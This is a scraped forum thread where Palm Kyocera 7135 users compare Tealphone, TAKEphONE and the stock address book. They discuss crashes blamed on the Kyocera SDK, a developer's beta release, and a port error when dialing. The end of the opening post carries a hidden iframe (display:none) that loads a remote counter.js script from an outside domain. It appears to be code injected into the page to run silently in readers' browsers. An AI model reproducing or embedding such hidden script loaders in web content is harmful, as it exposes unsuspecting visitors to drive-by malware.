+ Reply to Thread

Tealphone - better than the stock Address Book?

If you have Tealphone and love/hate it, share your experience here!

(and if you have another address book app you like better, lets hear about that too!)

Thanks,
    Jim, Palm neophyte<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I use Takephone - very nice app. Great one-handed finger operation for driving, etc. Beta 7135 version available. Developer is very accomodating. Found the link on this forum.

http://www.shsh.com/

Jim

I've used Tealphone for a while now and it fits my needs pretty well. Prolly doesn't do anything that all the other apps don't do. It allows you to select a number and call it with a press-and-hold of a button. Easy lookup that can be done one-handed (a big thing for me as I'm usually pulling luggage thru a terminal with the other hand).

Re: Tealphone - better than the stock Address Book?

Originally posted by jrobjr
    If you have Tealphone and love/hate it, share your experience here!

(and if you have another address book app you like better, lets hear about that too!)

Thanks,
    Jim, Palm neophyte
    I use Tealphone, and I like it a lot. I have quite a few contacts on my system (just over 1000) and Tealphone is much nicer than the standard address book app for getting to the contact you need quickly.
    Dave

Takephone seems nice but it crashes for me all the time.

Originally posted by richard
    Takephone seems nice but it crashes for me all the time.
    Hi,

As mentioned above - there seems to be a problem with using the Kyocera SDK for the 6035 on the 7135 - even their own supplied samples crush !

Until they release a new SDK, I have found a workaround, and I am currently working on releasing a BETA of TAKEphONE that's compatible with the 7135.

Thanks -
    Shimon Shnitzer
    Maker of TAKEphONE -
    "Take telephony into your Palm"

Thanks for the replies!

-Jim

Takephone is the best software for the 7135. verry fast and easy to get adresse with one hand, better than the native adress book

Marc-Andre

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar

Re: Re: Tealphone - better than the stock Address Book?

Originally posted by dwdod
    I use Tealphone, and I like it a lot. I have quite a few contacts on my system (just over 1000) and Tealphone is much nicer than the standard address book app for getting to the contact you need quickly.
    Me too! I use Tealphone on my 7135, and love it! When I dial a number directly from Tealphone, it sometimes crashes the 7135 (the inverted-screen bug). However, other third-party apps dialing the 7135 (markndial, etc) sometimes do the same... probably an SDK issue.
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

send an e-mail to Shimon at takephone@shsh.com and ask for the latest version 5.02, it will solve your problem im pretty sure. i used to have the same problem before i upgrade
    Marc-Andre

TealPhone question on the 7135

I use Tealphone for all of my contacts. I haven't figured out how to get the phone to dial from within Tealphone. When I select the contact that I wish to call, and click on the dial icon, I get an error message that says "could not open requested port".

Can anyone explain what setting I have missed in the Tealphone configuration?
    Dave

In PDA-Prefs, go to the Connection selection. You have to select Wireless Modem in your Available Connections. If you don't have such a choice, look in the FAW for alanb's excellent description on how to set it up. Once you have made that you choice, the hardware button press-and-hold should work.

Is there any that save pictures of the contact. Would be great if there is a address book that does that.